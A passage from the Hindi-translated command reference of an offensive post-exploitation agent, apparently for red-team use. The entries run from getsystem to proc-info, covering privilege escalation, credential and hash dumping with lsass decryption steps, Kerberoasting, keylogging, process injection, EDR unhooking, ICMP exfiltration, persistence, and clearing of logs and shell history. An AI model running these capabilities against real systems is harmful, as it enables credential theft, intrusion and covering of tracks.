getsystem | `getsystem [-technique steal\|potato\|check\|sudo\|osascript]` | **(विंडोज, लिनक्स, मैकओएस)** विशेषाधिकार वृद्धि। विंडोज: टोकन चोरी या DCOM पोटैटो के माध्यम से SYSTEM. लिनक्स: वृद्धि वैक्टर जांचें (SUID, sudo, क्षमताएं, डॉकर) या sudo एलिवेशन का प्रयास करें। macOS: वैक्टर जांचें, sudo, या osascript एडमिन प्रॉम्प्ट (T1134, T1548)।
gpp-password | `gpp-password -server <DC> -username <user@domain> -password <pass>` | एन्क्रिप्टेड cpassword विशेषताओं वाली GPP XML फ़ाइलों के लिए SYSVOL खोजें और प्रकाशित AES कुंजी (MS14-025) का उपयोग करके डिक्रिप्ट करें। SMB के माध्यम से क्रॉस-प्लेटफ़ॉर्म (T1552.006)।
gpo | `gpo -action <list\|links\|find\|all> -server <DC> -username <user@domain> -password <pass> [-filter <name>]` | LDAP के माध्यम से समूह नीति ऑब्जेक्ट गणना करें — GPO सूचीबद्ध करें, प्रवर्तन के साथ लिंक मैप करें, दिलचस्प CSE सेटिंग्स खोजें। क्रॉस-प्लेटफ़ॉर्म (T1615)।
grep | `grep -pattern <regex> [-path <dir>] [-extensions .txt,.xml] [-ignore_case] [-max_results 100]` | regex पैटर्न के लिए फ़ाइल सामग्री खोजें। एक्सटेंशन फ़िल्टरिंग, संदर्भ पंक्तियों और बाइनरी फ़ाइल छोड़ने के साथ पुनरावर्ती निर्देशिका खोज। क्रॉस-प्लेटफ़ॉर्म (T1083, T1552.001)।
hash | `hash -path <file_or_dir> [-algorithm md5\|sha1\|sha256\|sha512] [-recursive true] [-pattern *.exe] [-max_files 500]` | फ़ाइल हैश (MD5, SHA-1, SHA-256, SHA-512) की गणना करें। ग्लोब पैटर्न फ़िल्टरिंग और गहराई नियंत्रण के साथ एकल फ़ाइलें या निर्देशिकाएं। क्रॉस-प्लेटफ़ॉर्म (T1083)।
hexdump | `hexdump -path <file> [-offset <bytes>] [-length <bytes>]` | xxd-शैली हेक्स+ASCII प्रारूप में फ़ाइल सामग्री प्रदर्शित करें। विशिष्ट क्षेत्रों की जांच के लिए ऑफ़सेट/लंबाई नियंत्रण, अधिकतम 4096 बाइट्स। क्रॉस-प्लेटफ़ॉर्म (T1005)।
handles | `handles -pid <pid> [-type File] [-show_names] [-max_count 500]` | **(विंडोज, लिनक्स, मैकओएस)** एक प्रक्रिया में खुले हैंडल/फ़ाइल डिस्क्रिप्टर गणना करें। विंडोज: NtQuerySystemInformation. लिनक्स: /proc/pid/fd. macOS: lsof (T1057, T1082)।
hashdump | `hashdump [-action dump\|insitu\|insitu-full\|tickets\|auto-spray] [-targets <hosts>] [-format json]` | **(विंडोज, लिनक्स, मैकओएस)** स्थानीय खाता पासवर्ड हैश निकालें। विंडोज: SAM रजिस्ट्री से NTLM हैश (SYSTEM आवश्यक); **insitu**: प्रक्रिया में LSA APIs के माध्यम से सक्रिय लॉगऑन सत्र गणना (एडमिन आवश्यक); **insitu-full**: lsass.exe को PROCESS_VM_READ के साथ खोलें, LogonSessionList के लिए lsasrv.dll सिगस्कैन करें, लिंक्ड लिस्ट घूमें, प्रत्येक नोड पर KIWI_MSV1_0_LIST_63 लेआउट ओवरले करें LUID/UserName/Domain/AuthPackage/LogonType/Credentials-pointer निकालने के लिए, प्रति-AuthPackage क्रेडेंशियल चेन credentials_ptr पर घूमें प्रत्येक KIWI_MSV1_0_PRIMARY_CREDENTIAL_ENC लिफाफा कैप्चर करने के लिए, IV / h3DesKey / hAesKey BCrypt कुंजी ग्लोबल्स प्लस रॉ 16-बाइट IV / 24-बाइट 3DES / 32-बाइट AES कुंजी बाइट्स प्राप्त करने के लिए LsaInitializeProtectedMemory_Internal सिगस्कैन करें, प्रत्येक कैप्चर किए गए सिफरटेक्स्ट ब्लॉब को AES-256-CFB / 3DES-CBC डिक्रिप्ट करें (प्रति-ब्लॉब `len % 8` द्वारा चयनित), और NT/LM/SHA हैश निकालने के लिए KIWI_MSV1_0_PRIMARY_CREDENTIAL_10_NEW लेआउट ओवरले करें — `username:rid:lm:nt:::` प्रारूप में उत्सर्जित करें जो dump-action ProcessResponse क्रेडेंशियल-वॉल्ट हुक के साथ संगत है (Phase 2B + 2C-i + 2C-ii-a + 2C-ii-b + 2C-ii-c, Win10 21H2 — Win11 23H2, एडमिन आवश्यक)। लिनक्स: /etc/shadow हैश हैश-प्रकार पहचान के साथ (रूट आवश्यक)। macOS: डायरेक्टरी सर्विसेज PBKDF2 हैश उपयोगकर्ता plists से (रूट आवश्यक)। **auto-spray**: हैश डंप करें फिर उन्हें स्वचालित रूप से cred-check के माध्यम से लक्ष्य होस्ट पर स्प्रे करें। MITRE T1003.002, T1003.008.
history-scrub | `history-scrub [-action list\|clear\|clear-all] [-user <username>]` | शेल/एप्लिकेशन कमांड हिस्ट्री फ़ाइलें सूचीबद्ध या साफ़ करें। bash, zsh, fish, PowerShell, python, mysql और अधिक को कवर करता है। क्रॉस-प्लेटफ़ॉर्म (T1070.003)।
hollow | `hollow -filename <shellcode> [-target <process>] [-ppid <pid>] [-block_dlls true]` | प्रक्रिया होलोइंग — निलंबित प्रक्रिया बनाएं, शेलकोड लिखें, निष्पादन रीडायरेक्ट करें। **विंडोज:** CREATE_SUSPENDED + SetThreadContext, PPID स्पूफिंग, DLL ब्लॉकिंग, PEB सजावट (ImagePath/CommandLine/WindowTitle मास्किंग). **लिनक्स (amd64/arm64):** PTRACE_TRACEME + /proc/mem लेखन. **macOS:** ptrace + Mach VM APIs (task_for_pid, mach_vm_allocate, mach_vm_write, mach_vm_protect) — रूट आवश्यक। MITRE T1055.012, T1036.
ide-recon | `ide-recon -action <vscode\|jetbrains\|all> [-user <filter>]` | IDE कॉन्फ़िगरेशन गणना करें — VS Code एक्सटेंशन, रिमोट SSH होस्ट, हाल के प्रोजेक्ट, रहस्यों के साथ सेटिंग्स। JetBrains डेटा स्रोत, डिप्लॉयमेंट सर्वर, हाल के प्रोजेक्ट। क्रॉस-प्लेटफ़ॉर्म (T1005, T1083)।
ifconfig | `ifconfig` | पतों, MAC, MTU और फ़्लैग के साथ नेटवर्क इंटरफ़ेस सूचीबद्ध करें। क्रॉस-प्लेटफ़ॉर्म (विंडोज/लिनक्स/मैकओएस)।
inline-assembly | `inline-assembly` | **(केवल विंडोज)** CLR का उपयोग करके मेमोरी में एक .NET असेंबली निष्पादित करें। कमांड-लाइन तर्कों का समर्थन करता है। AMSI पैचिंग वर्कफ़्लो के लिए पहले `start-clr` का उपयोग करें।
inline-execute | `inline-execute` | **(केवल विंडोज)** मेमोरी में एक बीकन ऑब्जेक्ट फ़ाइल (BOF/COFF) निष्पादित करें। सभी तर्क प्रकारों का समर्थन करता है: स्ट्रिंग्स (z), वाइड स्ट्रिंग्स (Z), पूर्णांक (i), शॉर्ट्स (s), और बाइनरी (b)।
reflective-load | `reflective-load -dll_b64 <base64_dll> [-function <export>]` | **(केवल विंडोज)** मेमोरी से एक मूल PE (DLL) को वर्तमान प्रक्रिया में लोड करें। सेक्शन कॉपी करने, रिलोकेशन फिक्सअप, इम्पोर्ट रेज़ॉल्यूशन और DllMain आह्वान के साथ मैन्युअल PE मैपिंग। वैकल्पिक रूप से निर्यातित फ़ंक्शन कॉल करें (T1620)।
iptables | `iptables -action <status\|rules\|nat\|add\|delete\|flush> [-rule <args>] [-table <name>]` | **(केवल लिनक्स)** iptables/nftables/ufw के माध्यम से लिनक्स फ़ायरवॉल गणना और प्रबंधन। IP फ़ॉरवर्डिंग, कनेक्शन ट्रैकिंग, नियम सूचीकरण और संशोधन। MITRE T1562.004.
jobkill | `jobkill -id <task-uuid>` | कार्य ID द्वारा चल रहे कार्य को रोकें। चल रहे कार्यों को सूचीबद्ध करने के लिए `jobs` का उपयोग करें। क्रॉस-प्लेटफ़ॉर्म।
jobs | `jobs` | वर्तमान में चल रहे कार्यों को कार्य ID, कमांड नाम और अवधि के साथ सूचीबद्ध करें। क्रॉस-प्लेटफ़ॉर्म।
jxa | `jxa -code '<script>' [-timeout 60]` or `jxa -file /path/to/script.js` | **(केवल मैकओएस)** Foundation, AppKit, Security फ्रेमवर्क तक ObjC ब्रिज एक्सेस के साथ जावास्क्रिप्ट फॉर ऑटोमेशन (JXA) स्क्रिप्ट निष्पादित करें। इनलाइन कोड और फ़ाइल इनपुट का समर्थन करता है (T1059.007)।
kerberoast | `kerberoast -server <DC> -username <user@domain> -password <pass> [-spn <SPN>]` | SPN खातों के लिए TGS टिकट का अनुरोध करें और ऑफ़लाइन क्रैकिंग के लिए हैशकैट प्रारूप में हैश निकालें। LDAP के माध्यम से स्वचालित गणना। क्रॉस-प्लेटफ़ॉर्म (T1558.003)।
klist | `klist -action <list\|purge\|dump\|import> [-server <filter>] [-ticket <base64>] [-path <path>]` | केर्बेरोस टिकट गणना करें, डंप करें, शुद्ध करें और आयात करें। आयात पास-द-टिकट सक्षम करता है: विंडोज LSA के माध्यम से kirbi इंजेक्ट करता है, लिनक्स/macOS ccache लिखता है + KRB5CCNAME सेट करता है। क्रॉस-प्लेटफ़ॉर्म (T1558, T1550.003)।
keychain | `keychain -action <list\|dump\|find-password\|find-internet\|find-cert> [-service <name>] [-server <host>]` | **(केवल मैकओएस)** macOS कीचेन एक्सेस करें — कीचेन सूचीबद्ध करें, मेटाडेटा डंप करें, सामान्य/इंटरनेट पासवर्ड खोजें, प्रमाणपत्र गणना करें।
kerb-delegation | `kerb-delegation -action <all\|unconstrained\|constrained\|rbcd\|monitor> -server <DC> -username <user@domain> -password <pass> [-duration <s>] [-interval <s>]` | केर्बेरोस प्रतिनिधिमंडल संबंधों की गणना करें — अनियंत्रित, नियंत्रित (प्रोटोकॉल संक्रमण के साथ), RBCD. **monitor** क्रिया (विंडोज/SYSTEM केवल) आने वाले TGT के लिए LSA को पोल करती है और kirbi ब्लॉब के रूप में निर्यात करती है। monitor को छोड़कर क्रॉस-प्लेटफ़ॉर्म (T1550.003, T1558)।
keylog | `keylog -action <start\|stop\|dump\|status\|clear>` | निम्न-स्तरीय कीबोर्ड लॉगर। विंडोज: SetWindowsHookEx. लिनक्स: /dev/input evdev. macOS: IOKit HID. Ctrl+V/Cmd+V पेस्ट ईवेंट का पता लगाता है और क्लिपबोर्ड सामग्री कैप्चर करता है। सभी प्लेटफ़ॉर्म पर विंडो संदर्भ ट्रैकिंग (T1056.001)।
lateral-check | `lateral-check -hosts <IPs/CIDRs> [-timeout <seconds>]` | लक्ष्यों के विरुद्ध पार्श्व आंदोलन विकल्पों का परीक्षण करें — SMB, WinRM, RDP, RPC, SSH कनेक्टिविटी जांचता है और लागू विधियों का सुझाव देता है। क्रॉस-प्लेटफ़ॉर्म (T1046, T1021)।
last | `last [-action logins\|failed\|reboot] [-count 25] [-user <username>]` | लॉगिन इतिहास, असफल लॉगिन प्रयास और सिस्टम बूट/शटडाउन ईवेंट दिखाएं। लिनक्स: wtmp/btmp पार्स करता है। विंडोज: सुरक्षा/सिस्टम ईवेंट लॉग। macOS: मूल `last` + यूनिफाइड लॉग। (T1087.001, T1110, T1082)।
ldap-query | `ldap-query -action <users\|computers\|groups\|domain-admins\|spns\|asrep\|admins\|disabled\|gpo\|ou\|password-never-expires\|trusts\|unconstrained\|constrained\|dacl\|gmsa\|bloodhound\|query> -server <DC>` | LDAP के माध्यम से Active Directory क्वेरी करें। उपयोगकर्ताओं, कंप्यूटरों, समूहों, डोमेन व्यवस्थापकों, सभी व्यवस्थापकों (adminCount), SPN, AS-REP रोस्ट योग्य, अक्षम खाते, GPO, OU, पासवर्ड-कभी-समाप्त नहीं, डोमेन ट्रस्ट, अनियंत्रित/नियंत्रित प्रतिनिधिमंडल, DACL विश्लेषण, gMSA पासवर्ड निष्कर्षण, BloodHound CE v6 संग्रह (ग्राफ विश्लेषण के लिए उपयोगकर्ता/कंप्यूटर/समूह/OU/GPO/ट्रस्ट), या कस्टम LDAP फ़िल्टर के लिए प्रीसेट क्वेरी। क्रॉस-प्लेटफ़ॉर्म (T1087.002, T1482, T1555, T1003, T1615)।
ldap-write | `ldap-write -action <add-member\|remove-member\|set-attr\|add-attr\|remove-attr\|set-spn\|disable\|enable\|set-password\|shadow-cred\|clear-shadow-cred\|create-machine\|rbcd\|delete\|gpo-task\|gpo-script\|template-esc1\|template-esc4> -server <DC> -target <obj>` | LDAP के माध्यम से AD ऑब्जेक्ट संशोधित करें। समूह सदस्यता, विशेषताएँ, SPN, खाता सक्षम/अक्षम, पासवर्ड रीसेट, छाया क्रेडेंशियल, मशीन खाता निर्माण, RBCD प्रतिनिधिमंडल, ऑब्जेक्ट हटाना। GPO दुरुपयोग: निर्धारित कार्य (gpo-task) या स्टार्टअप स्क्रिप्ट (gpo-script) इंजेक्ट करें। ADCS: ESC1/ESC4 शोषण के लिए प्रमाणपत्र टेम्पलेट संशोधित करें। क्रॉस-प्लेटफ़ॉर्म (T1098, T1556.006, T1484.001, T1649)।
kill | `kill -pid <PID>` | PID द्वारा एक प्रक्रिया को समाप्त करें। क्रॉस-प्लेटफ़ॉर्म (विंडोज/लिनक्स/मैकओएस)।
laps | `laps -server <DC> -username <user@domain> -password <pass> [-filter <computer>]` | LDAP के माध्यम से AD से LAPS पासवर्ड पढ़ें। LAPS v1 (ms-Mcs-AdmPwd) और विंडोज LAPS v2 (ms-LAPS-Password) का समर्थन करता है। क्रॉस-प्लेटफ़ॉर्म (T1552.006)।
lsa-secrets | `lsa-secrets -action <dump\|cached>` | **(केवल विंडोज)** LSA रहस्य (सेवा पासवर्ड, DPAPI कुंजी, मशीन खाता) और कैश्ड डोमेन क्रेडेंशियल (DCC2/MSCacheV2 हैशकैट प्रारूप) निकालें। SYSTEM आवश्यक (T1003.004, T1003.005)।
launchagent | `launchagent -action <install\|remove\|list> -label <com.example.name> [-path <exe>] [-daemon true]` | **(केवल मैकओएस)** LaunchAgent/LaunchDaemon स्थिरता स्थापित करें, हटाएं या सूचीबद्ध करें। RunAtLoad+KeepAlive के साथ plist बनाता है।
link | `link -host <ip> -port <port> [-connection_type tcp\|namedpipe] [-pipe_name <name>]` | आंतरिक पिवोटिंग के लिए TCP या नेम्ड पाइप के माध्यम से P2P एजेंट से लिंक करें। नेम्ड पाइप मोड विंडोज ट्रैफ़िक के लिए SMB पोर्ट 445 का उपयोग करता है। क्रॉस-प्लेटफ़ॉर्म TCP, विंडोज-केवल नेम्ड पाइप (T1572)।
ln | `ln -target <existing> -link <new> [-symbolic true] [-force true]` | प्रतीकात्मक या हार्ड लिंक बनाएं। सिमलिंक गैर-मौजूद पथों की ओर इंगित कर सकते हैं। फ़ोर्स मोड मौजूदा लिंक को बदल देता है। क्रॉस-प्लेटफ़ॉर्म (T1036)।
linux-logs | `linux-logs -action <list\|read\|logins\|clear\|truncate\|shred> [-file <path>] [-search <filter>] [-lines <n>]` | **(केवल लिनक्स)** लिनक्स लॉग फ़ाइलें और बाइनरी लॉगिन रिकॉर्ड (wtmp/btmp/utmp) सूचीबद्ध करें, पढ़ें, साफ़ करें या छेड़छाड़ करें। चयनात्मक पंक्ति हटाने और सुरक्षित श्रेडिंग का समर्थन करता है (T1070.002)।
logonsessions | `logonsessions [-action list\|users] [-filter <name>]` | **(विंडोज, लिनक्स, मैकओएस)** सक्रिय लॉगऑन सत्र गणना करें — उपयोगकर्ता, सत्र ID, स्टेशन, कनेक्शन स्थिति। उपयोगकर्ता नाम से फ़िल्टर करें। विंडोज: WTS API. लिनक्स: utmp पार्सिंग. macOS: utmpx पार्सिंग.
lolbin | `lolbin -action <technique> -path <payload/code/URL> [-export <func>] [-args <extra>]` | **(विंडोज, लिनक्स, मैकओएस)** LOLBin/GTFOBin प्रॉक्सी निष्पादन। विंडोज: rundll32, msiexec, regsvcs, regasm, mshta, certutil, regsvr32, installutil, vbs. क्रॉस-प्लेटफ़ॉर्म: python, lua, perl, ruby, node, awk. लिनक्स: curl, wget, gcc. macOS: osascript, swift, open, curl. T1218/T1059.
ls | `ls [path]` | स्वामी/समूह और टाइमस्टैम्प के साथ फ़ाइलें और फ़ोल्डर सूचीबद्ध करें। फ़ाइल ब्राउज़र एकीकरण। डिफ़ॉल्ट रूप से cwd.
make-token | `make-token -username <user> -domain <domain> -password <pass> [-action impersonate\|spawn\|auto-verify -command <cmd>]` | **(केवल विंडोज)** क्रेडेंशियल से एक टोकन बनाएं: इसे प्रतिरूपित करें, एक प्रक्रिया स्पॉन करें, या **auto-verify** (प्रतिरूपित करें फिर whoami + getprivs श्रृंखला) (T1134.002)।
masquerade | `masquerade -source <file> -technique <type> [-disguise <value>] [-in_place]` | फ़ाइल मास्करेडिंग और छिपाना — फ़ाइलों को छिपाएं (डबल एक्सट, RtLO, स्पेस, प्रक्रिया मैच) या गणना से छुपाएं (हाइड/अनहाइड)। विंडोज: +H/+S विशेषताएँ। लिनक्स: डॉट-उपसर्ग। macOS: UF_HIDDEN + डॉट-उपसर्ग (T1036, T1564.001)।
mkdir | `mkdir <directory>` | एक नई निर्देशिका बनाएं (यदि आवश्यक हो तो अभिभावक निर्देशिकाएं बनाता है)।
module-stomp | `module-stomp -pid <PID> [-dll_name <DLL>]` | **(केवल विंडोज)** एक वैध DLL के .text सेक्शन को स्टॉम्प करके शेलकोड इंजेक्ट करें। शेलकोड हस्ताक्षरित DLL पता स्थान से निष्पादित होता है, निजी-मेमोरी डिटेक्शन को बायपास करता है (T1055.001)।
modules | `modules [-pid <PID>] [-filter <name>]` | वैकल्पिक नाम फ़िल्टरिंग के साथ एक प्रक्रिया में लोडेड मॉड्यूल/DLL/लाइब्रेरी सूचीबद्ध करें। क्रॉस-प्लेटफ़ॉर्म (T1057)।
mem-scan | `mem-scan -pid <PID> -pattern <string> [-hex] [-max_results <n>] [-context_bytes <n>]` | हेक्स डंप आउटपुट के साथ प्रक्रिया मेमोरी में बाइट पैटर्न खोजें। विंडोज: VirtualQueryEx/ReadProcessMemory. लिनक्स: /proc/pid/maps+mem. macOS: mach_vm_region/mach_vm_read (केवल स्व-स्कैन). स्ट्रिंग और हेक्स पैटर्न का समर्थन करता है। क्रॉस-प्लेटफ़ॉर्म (T1005, T1057)।
mount | `mount [-filter <substring>] [-fstype <type>]` | डिवाइस, माउंट पॉइंट, प्रकार और विकल्पों के साथ माउंटेड फ़ाइलसिस्टम सूचीबद्ध करें। नाम या फ़ाइलसिस्टम प्रकार द्वारा फ़िल्टरिंग का समर्थन करता है। क्रॉस-प्लेटफ़ॉर्म (T1082)।
mv | `mv <source> <destination>` | किसी फ़ाइल को स्रोत से गंतव्य पर ले जाएं या नाम बदलें।
named-pipes | `named-pipes [-filter <pattern>]` | **(विंडोज, लिनक्स, मैकओएस)** IPC खोज के लिए नेम्ड पाइप (विंडोज), यूनिक्स डोमेन सॉकेट और FIFO (लिनक्स/मैकओएस) सूचीबद्ध करें। सबस्ट्रिंग फ़िल्टरिंग का समर्थन करता है (T1083)।
net-enum | `net-enum -action <users\|groups\|groupmembers\|admins\|sessions\|shares\|domainusers\|domaingroups\|domaininfo\|loggedon\|mapped> [-target <host>] [-group <name>]` | **(विंडोज, लिनक्स, मैकओएस)** क्रॉस-प्लेटफ़ॉर्म नेटवर्क गणना। उपयोगकर्ता, समूह, समूह सदस्य, व्यवस्थापक, सत्र, शेयर। विंडोज: Win32 NetAPI (डोमेन क्वेरी, मैप की गई ड्राइव). लिनक्स: /etc/passwd + /etc/group + utmp + NFS/Samba. macOS: dscl + who + sharing. (T1033, T1049, T1087, T1135)।
net-group | `net-group -action <list\|members\|user\|privileged> -server <DC> [-group <name>] [-user <sAMAccountName>] -username <user@domain> -password <pass>` | LDAP के माध्यम से AD समूह सदस्यता गणना करें। पुनरावर्ती सदस्य समाधान, उपयोगकर्ता समूह लुकअप, विशेषाधिकार प्राप्त समूह गणना। क्रॉस-प्लेटफ़ॉर्म (T1069.002)।
net-user | `net-user -action <add\|delete\|info\|password\|group-add\|group-remove\|disable\|enable\|lockout> -username <name> [-password <pass>] [-group <group>]` | स्थानीय उपयोगकर्ता खाते और समूह सदस्यता प्रबंधित करें। विंडोज: netapi32 API. लिनक्स: useradd/userdel/usermod/chpasswd. macOS: dscl/dseditgroup. T1531 रैनसमवेयर सिमुलेशन के लिए अक्षम/सक्षम/लॉकआउट। क्रॉस-प्लेटफ़ॉर्म (T1136.001, T1098, T1531)।
net-stat | `net-stat [-state <LISTEN\|ESTABLISHED\|...>] [-proto <tcp\|udp>] [-port <number>] [-pid <number>]` | प्रोटोकॉल, स्थिति, PID और प्रक्रिया नाम के साथ सक्रिय नेटवर्क कनेक्शन और सुनने वाले पोर्ट सूचीबद्ध करें। स्थिति, प्रोटोकॉल, पोर्ट और प्रक्रिया ID द्वारा फ़िल्टरिंग का समर्थन करता है। क्रॉस-प्लेटफ़ॉर्म।
ntdll-unhook | `ntdll-unhook [-action unhook\|check] [-dll ntdll.dll\|kernel32.dll\|kernelbase.dll\|advapi32.dll\|user32.dll\|all] [-source disk\|knowndlls]` | **(केवल विंडोज)** एक साफ प्रति से .text सेक्शन को पुनर्स्थापित करके DLL से EDR इनलाइन हुक हटाएं। 5 DLL या `all` का समर्थन करता है। `check` बिना संशोधन के हुक रिपोर्ट करता है। `knowndlls` स्रोत \\KnownDlls\\ सेक्शन ऑब्जेक्ट का उपयोग करता है (डिस्क I/O से बचता है — अधिक OPSEC-अनुकूल) (T1562.001)।
syscalls | `syscalls [-action status\|list\|init]` | **(केवल विंडोज)** अप्रत्यक्ष सिस्कॉल रिज़ॉल्वर। ntdll निर्यात को पार्स करके Nt* सिस्कॉल नंबर हल करता है और स्टब उत्पन्न करता है जो ntdll के syscall;ret गैजेट पर कूदता है। सक्रिय होने पर, इंजेक्शन कमांड यूज़रलैंड API हुक को बायपास करते हैं (T1106)।
opus-injection | `opus-injection` | **(केवल विंडोज)** कॉलबैक-आधारित प्रक्रिया इंजेक्शन। वेरिएंट 1: Ctrl-C हैंडलर चेन। वेरिएंट 4: PEB KernelCallbackTable. [विवरण](https://github.com/galoryber/fawkes/blob/HEAD/research/injection-techniques.md#opus-injection)
persist | `persist -method <method> -action <install\|remove\|check>` | **(विंडोज, लिनक्स, मैकओएस)** स्थिरता स्थापित करें या हटाएं। विंडोज: रजिस्ट्री, स्टार्टअप-फ़ोल्डर, com-hijack, स्क्रीनसेवर, ifeo, विनलॉगन, प्रिंट-प्रोसेसर, एक्सेसिबिलिटी, एक्टिव-सेटअप, टाइम-प्रोवाइडर, पोर्ट-मॉनिटर, wmi-event (T1546.003), netsh-helper (T1546.007). लिनक्स: crontab, systemd, शेल-प्रोफ़ाइल, ssh-key, xdg-autostart, motd (रूट, T1546), rc-local (रूट, T1037.004), apt-hook (रूट, T1546), udev-rule (रूट, T1546). macOS: launchagent, पीरियोडिक (रूट, T1053.003), फ़ोल्डर-एक्शन (T1546), लॉगिन-आइटम (T1547.015), auth-प्लगइन (रूट, T1547.002), dylib-hijack (T1574.004, स्कैन/इंस्टॉल/रिमूव), xpc-सर्विस (MachServices + KeepAlive). सभी विधियां इंस्टॉल/रिमूव/लिस्ट का समर्थन करती हैं।
persist-enum | `persist-enum [-category <all\|platform-specific>]` | **(विंडोज, लिनक्स, मैकओएस)** स्थिरता तंत्र की केवल-पढ़ने योग्य गणना। विंडोज: रजिस्ट्री, स्टार्टअप, कार्य, सेवाएं। लिनक्स: cron, systemd, शेल प्रोफ़ाइल, SSH कुंजी, LD_PRELOAD, udev नियम, कर्नेल मॉड्यूल, motd, at नौकरियां, D-Bus सेवाएं, PAM मॉड्यूल, पैकेज हुक, logrotate स्क्रिप्ट, NetworkManager डिस्पैचर, anacron. macOS: LaunchAgents, लॉगिन आइटम, पीरियोडिक स्क्रिप्ट, auth प्लगइन, emond, at नौकरियां (T1547, T1546, T1053, T1543, T1556)।
password-managers | `password-managers [-depth <N>]` | पासवर्ड मैनेजर डेटाबेस और कॉन्फ़िग फ़ाइलें खोजें — KeePass (.kdbx), 1Password, Bitwarden, LastPass, Dashlane, KeePassXC. क्रॉस-प्लेटफ़ॉर्म (T1555)।
poolparty-injection | `poolparty-injection` | **(केवल विंडोज)** PoolParty तकनीकों का उपयोग करके शेलकोड इंजेक्ट करें जो विंडोज थ्रेड पूल आंतरिक का दुरुपयोग करती हैं। सभी 8 वेरिएंट समर्थित। [विवरण](https://github.com/galoryber/fawkes/blob/HEAD/research/injection-techniques.md#poolparty-injection)
ping | `ping -hosts <IP/CIDR/range> [-port 445]` or `ping -action exfil-icmp -target <IP> -file <path>` | TCP कनेक्ट होस्ट पहुंच योग्यता (T1018) + XOR एन्कोडिंग और जिटर के साथ इको अनुरोध पेलोड के माध्यम से ICMP डेटा एक्सफिल्ट्रेशन (T1048.003, T1095)।
pipe-server | `pipe-server -action <check\|impersonate> [-name <pipe>] [-timeout 30]` | **(केवल विंडोज)** विशेषाधिकार वृद्धि के लिए नेम्ड पाइप प्रतिरूपण। पाइप सर्वर बनाएं, विशेषाधिकार प्राप्त क्लाइंट कनेक्शन की प्रतीक्षा करें, टोकन प्रतिरूपित करें। SeImpersonatePrivilege आवश्यक (T1134.001)।
printspoofer | `printspoofer [-timeout 15]` | **(केवल विंडोज)** PrintSpoofer विशेषाधिकार वृद्धि — प्रिंट स्पूलर के माध्यम से SeImpersonate से SYSTEM. नेम्ड पाइप बनाएं, OpenPrinterW के माध्यम से स्पूलर कनेक्शन ट्रिगर करें, SYSTEM टोकन प्रतिरूपित करें। एक-चरण NETWORK SERVICE → SYSTEM (T1134.001)।
pkg-list | `pkg-list [-filter <substring>]` | स्थापित पैकेज और सॉफ़्टवेयर सूचीबद्ध करें। dpkg/rpm/apk (लिनक्स), Homebrew/Applications (macOS), या रजिस्ट्री अनइंस्टॉल कुंजी (विंडोज) गणना करता है। नाम फ़िल्टरिंग का समर्थन करता है। क्रॉस-प्लेटफ़ॉर्म (T1518)।
port-scan | `port-scan -hosts <IPs/CIDRs> [-ports <ports>] [-timeout <s>]` | नेटवर्क सेवा खोज के लिए TCP कनेक्ट स्कैन। CIDR, IP रेंज और पोर्ट रेंज का समर्थन करता है। क्रॉस-प्लेटफ़ॉर्म।
powershell | `powershell <command> [--encoded]` | **(केवल विंडोज)** OPSEC-हार्डन फ़्लैग (संक्षिप्त, यादृच्छिक) के साथ powershell.exe के माध्यम से एक PowerShell कमांड निष्पादित करें। प्रक्रिया ट्री से आर्ग्स छिपाने के लिए एन्कोडेड कमांड मोड का समर्थन करता है।
prefetch | `prefetch -action <list\|parse\|delete\|clear> [-name <exe>] [-count <max>]` | **(केवल विंडोज)** विंडोज प्रीफ़ेच फ़ाइलें पार्स और प्रबंधित करें। निष्पादित प्रोग्राम सूचीबद्ध करें, रन हिस्ट्री पार्स करें (8 टाइमस्टैम्प तक), विशिष्ट प्रविष्टियाँ हटाएं, या सभी साफ़ करें। MAM-संपीडित फ़ाइलों का समर्थन करता है (T1070.004)।
privesc-check | `privesc-check -action <all\|auto-escalate\|privileges\|services\|registry\|uac\|dll-hijack\|dll-plant\|dll-sideload\|dll-exports\|hijack-execute\|hijack-deploy\|hijack-cleanup\|hijack-trigger\|service-registry\|...>` | विशेषाधिकार वृद्धि गणना और शोषण। `auto-escalate`: स्वचालित उपकार्य श्रृंखला — सभी वैक्टर गणना करता है फिर सर्वोत्तम उपलब्ध वृद्धि का प्रयास करता है (UAC बाईपास, टोकन चोरी, या sudo)। `hijack-execute`: स्वचालित प्रॉक्सी DLL फैक्ट्री — लक्ष्य DLL निर्यात पढ़ता है, सर्वर एम्बेडेड शेलकोड के साथ प्रॉक्सी DLL संकलित करता है (mingw). `hijack-deploy`: प्रॉक्सी DLL तैनात करता है (मूल का नाम बदलता है, प्रॉक्सी रखता है). `hijack-trigger`: हाइजैक ट्रिगर करता है — किसी सेवा को पुनरारंभ करें (`-trigger restart -service_name <svc>`) या प्रॉक्सी DLL लोड करने के लिए एक प्रक्रिया स्पॉन करें (`-trigger spawn -source <exe>`). `hijack-cleanup`: तैनात हाइजैक को उलट देता है (प्रॉक्सी हटाता है, मूल पुनर्स्थापित करता है). विंडोज: टोकन विशेषाधिकार, अकोटेड सेवाएं, AlwaysInstallElevated, ऑटो-लॉगऑन, UAC, unattend फ़ाइलें, DLL हाइजैक स्कैनिंग (फैंटम DLL, लेखन योग्य PATH, KnownDLLs), टाइमस्टॉम्पिंग के साथ DLL प्लांटिंग, DLL साइडलोडिंग, PE निर्यात गणना (dll-exports DEF फ़ाइल जनरेशन के साथ), सेवा रजिस्ट्री अनुमति दुरुपयोग। लिनक्स: SUID/SGID, क्षमताएं, sudo, कंटेनर, cron हाइजैकिंग, NFS no_root_squash, systemd यूनिट, sudo टोकन, PATH हाइजैकिंग, डॉकर समूह, खतरनाक समूह, Polkit नियम, modprobe हुक, ld.so.preload इंजेक्शन, सुरक्षा मॉड्यूल (AppArmor/SELinux). macOS: LaunchDaemons, TCC, dylib हाइजैकिंग, SIP. क्रॉस-प्लेटफ़ॉर्म (T1548, T1574.001, T1574.002, T1574.009, T1574.011).
psexec | `psexec -host <target> -command <cmd> [-name <svcname>] [-cleanup <true\|false>]` or `psexec -action check -host <target>` | **(केवल विंडोज)** SCM सेवा निर्माण के माध्यम से रिमोट होस्ट पर कमांड निष्पादित करें — PSExec-शैली पार्श्व आंदोलन। `check` निष्पादित किए बिना पूर्वापेक्षाएँ मान्य करता है (SMB 445, SCM एक्सेस, एडमिन शेयर). MITRE T1021.002, T1569.002.
proc-info | `proc-info -action <info\|connections\|mounts\|modules> [-pid <PID>]` | **(केवल लिनक्स)** गहन /proc निरीक्षण: प्रक्रिया विवरण (cmdline, env, caps, cgroups, नेमस्पेस, FD), PID रिज़ॉल्यूशन के साथ नेटवर्क कनेक्शन, माउंट, कर्नेल मॉड्यूल। MITRE T1057.
